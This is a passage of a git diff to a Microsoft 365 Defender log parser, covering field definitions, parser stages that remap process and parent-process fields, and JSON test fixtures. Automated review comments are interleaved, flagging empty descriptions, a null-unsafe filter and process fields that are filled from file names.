@@ -529,6 +412,143 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword +action.properties.process.AccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.process.AccountObjectId + type: keyword + +action.properties.process.CommandLine: + description: Process commande Line that initiated the event + name: action.properties.process.CommandLine + type: keyword + +action.properties.process.FileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.process.FileSize + type: long + +action.properties.process.IntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.process.IntegrityLevel + type: keyword + +action.properties.process.LogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.process.LogonId + type: keyword + +action.properties.process.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.process.TokenElevation + type: keyword + +action.properties.process.VersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.process.VersionInfoCompanyName + type: keyword + +action.properties.process.VersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.process.VersionInfoFileDescription + type: keyword + +action.properties.process.VersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.process.VersionInfoInternalFileName + type: keyword + +action.properties.process.VersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.process.VersionInfoOriginalFileName + type: keyword + +action.properties.process.VersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.process.VersionInfoProductName + type: keyword + +action.properties.process.VersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.process.VersionInfoProductVersion + type: keyword + +action.properties.process.parent.AccountObjectId: + description: Azure AD object ID of the user account that ran the parent process + responsible for the event + name: action.properties.process.parent.AccountObjectId + type: keyword + +action.properties.process.parent.CommandLine: + description: Parent process commande Line that initiated the event + 
name: action.properties.process.parent.CommandLine + type: keyword + +action.properties.process.parent.FileSize: + description: Size of the parent process (image file) that initiated the event + name: action.properties.process.parent.FileSize + type: long + +action.properties.process.parent.IntegrityLevel: + description: Integrity level of the parent process that initiated the event. Windows + assigns integrity levels to processes based on certain characteristics, such as + if they were launched from an internet download. These integrity levels influence + permissions to resources + name: action.properties.process.parent.IntegrityLevel + type: keyword + +action.properties.process.parent.LogonId: + description: Identifier for a logon session of the parent process that initiated + the event. This identifier is unique on the same machine only between restarts. + name: action.properties.process.parent.LogonId + type: keyword + +action.properties.process.parent.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the parent process that initiated the event + name: action.properties.process.parent.TokenElevation + type: keyword + +action.properties.process.parent.VersionInfoCompanyName: + description: Company name from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoCompanyName + type: keyword + +action.properties.process.parent.VersionInfoFileDescription: + description: Description from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoFileDescription + type: keyword + +action.properties.process.parent.VersionInfoInternalFileName: + description: Internal file name from the version information of the parent process + (image file) responsible for the event + name: 
action.properties.process.parent.VersionInfoInternalFileName + type: keyword + +action.properties.process.parent.VersionInfoOriginalFileName: + description: '' + name: action.properties.process.parent.VersionInfoOriginalFileName + type: keyword + +action.properties.process.parent.VersionInfoProductName: + description: '' + name: action.properties.process.parent.VersionInfoProductName + type: keyword + +action.properties.process.parent.VersionInfoProductVersion: + description: Product version from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoProductVersion + type: keyword + email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction @@ -821,6 +841,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..f60d9b6f0 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
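Review bot: Four of the new field definitions ship with `description: ''` — `action.properties.process.parent.VersionInfoOriginalFileName` and `action.properties.process.parent.VersionInfoProductName` in this hunk, `process.parent.user.domain` and `process.parent.user.email` in the `@@ -821` hunk — although the deleted entries they were renamed from carried descriptions; since this file feeds the field catalogue analysts see, fill them in, e.g. `description: Original file name from the version information of the parent process (image file) responsible for the event`. The relocated `action.properties.process.*` entries also mix two phrasings (`CommandLine` says "that initiated the event" while `IntegrityLevel` and the `VersionInfo*` entries say "the newly created process") and keep the `commande Line` typo from the removed entries, so the rename reads as a copy rather than a deliberate re-documentation; one consistent wording per prefix (`process.*` = the process the event is about, `process.parent.*` = its parent) would make the intent clear.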
@@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", 
"exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields 
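Review bot: Both new `filter` expressions call `json_event.message.properties.get("ActionType").lower()` unguarded, so an `AdvancedHunting-DeviceEvents` record with a missing or null `ActionType` likely raises an undefined-value error in the filter rather than evaluating to false, depending on how the pipeline's template engine treats attribute access on None. A null-safe form for both filters is `(json_event.message.properties.get("ActionType") or "").lower()`. The 32-entry action-type list is also pasted verbatim into both filters; the two copies must stay identical for every event to land in exactly one of the two stages, so a comment above the first one such as `# Keep this action-type list identical to the one in set_process_deviceprocess_events below` would make that coupling visible to the next editor.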
@@ -126,22 +130,6 @@ stages:
 host.os.full: "{{json_event.message.properties.OSPlatform}}"
 host.os.version: "{{json_event.message.properties.OSVersion}}"
 host.type: "{{json_event.message.properties.DeviceType}}"
- process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
- process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
- process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
- process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
- process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
- process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
- process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
- process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
- process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
- process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
- process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
- process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
- process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
- process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
- process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
- process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
 registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
 registry.key: "{{json_event.message.properties.RegistryKey}}"
 registry.value: "{{json_event.message.properties.RegistryValueName}}"
@@ -166,18 +154,6 @@ stages:
 action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}"
 action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}"
 action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}"
- action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
- action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
- action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
- action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
- action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
- action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
- action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
- action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
- action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
- action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
- action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}"
 action.properties.Location: "{{json_event.message.properties.Location}}"
 action.properties.LogonId: "{{json_event.message.properties.LogonId}}"
@@ -250,12 +226,6 @@ stages:
 - set:
 user.roles: '["{{json_event.message.properties.AccountType}}"]'
 filter: '{{json_event.message.properties.get("AccountType")}}'
- - set:
- process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
- filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}'
- - set:
- process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
- filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}'
 - set:
 network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}"
 filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}'
@@ -274,6 +244,98 @@ stages:
 }
 filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
+ set_process_events:
+ actions:
+ - set:
+ process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+ process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+ process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+ process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+ process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+ process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+ process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+ process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+ process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+ process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+ process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+ process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+ process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+ process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+ process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+ process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
+ action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+
+ - set:
+ process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}'
+
+ - set:
+ process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}'
+
+ set_process_deviceprocess_events:
+ actions:
+ - set:
+ process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+ process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+ process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+ process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+ process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+ process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+ process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+ process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}"
+ process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+ process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+ process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+ process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+ process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+ process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+ process.pid: "{{json_event.message.properties.ProcessId}}"
+ process.start: "{{json_event.message.properties.ProcessCreationTime}}"
+ process.name: "{{json_event.message.properties.FileName | basename}}"
+ process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
+ process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
+ action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+
+ - set:
+ process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}'
+
+ - set:
+ process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
+ filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}'
+
 set_alert_evidence_fields:
 actions:
 - set:
@@ -356,7 +418,7 @@ stages:
 event.dataset: "device_events"
 event.category: ["host"]
 action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}"
- action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+ #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 set_device_file_certificate_info_fields:
 actions:
 - set:
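Review bot: In `set_process_deviceprocess_events` the `process.name`, `process.working_directory`, `process.pid` and `process.start` mappings read `FileName`, `FolderPath`, `ProcessId` and `ProcessCreationTime` for every DeviceEvents action type outside the exclusion list, but for many of those `FileName` is the file acted on rather than a process image: the new `test_device_event_sensitive_file_read.json` fixture expects `process.name: "FileName.mdb"` and `process.working_directory: "C:"` while `file.name` carries the same `FileName.mdb`. Detection rules keyed on `process.name` would then match document names, so the `process.*` lines in that stage should be gated on the event really describing a created process, e.g. by moving those five lines into their own `- set:` with `filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or json_event.message.properties.get("ProcessId") != None}}'`. Separately, in `set_process_events` `process.start` now reads only `InitiatingProcessCreationTime` while `process.pid` still falls back through `ProcessId or InitiatingProcessId`, so pid and start can describe two different processes; either restore `"{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"` for `process.start` or drop the `ProcessId` fallback from `process.pid`.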
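Review bot: The removed `action.properties.ProcessTokenElevation` mapping is kept as a `#`-prefixed line rather than deleted, and the `@@ -469,15 +531,15 @@` hunk does the same for nine `process.code_signature.*` and `action.properties.ProcessVersionInfo*` lines. Commented-out mappings in a parser tend to be resurrected later or drift from the live keys, and their replacements now live under `action.properties.process` in `set_process_deviceprocess_events`, so these lines can simply be deleted with git history keeping the old form. If the intent is to record where the values went, a single comment such as `# ProcessTokenElevation is now mapped to action.properties.process.TokenElevation in set_process_deviceprocess_events` says more than the dead line.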
@@ -469,15 +531,15 @@ stages:
 - set:
 event.dataset: "device_process_events"
 event.category: ["process"]
- process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
- process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
- action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+ #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+ #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
 set_device_registry_events_fields:
 actions:
 - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index ca708b0ed..17cad5081 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..fedd99aea --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -0,0 +1,100 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": 
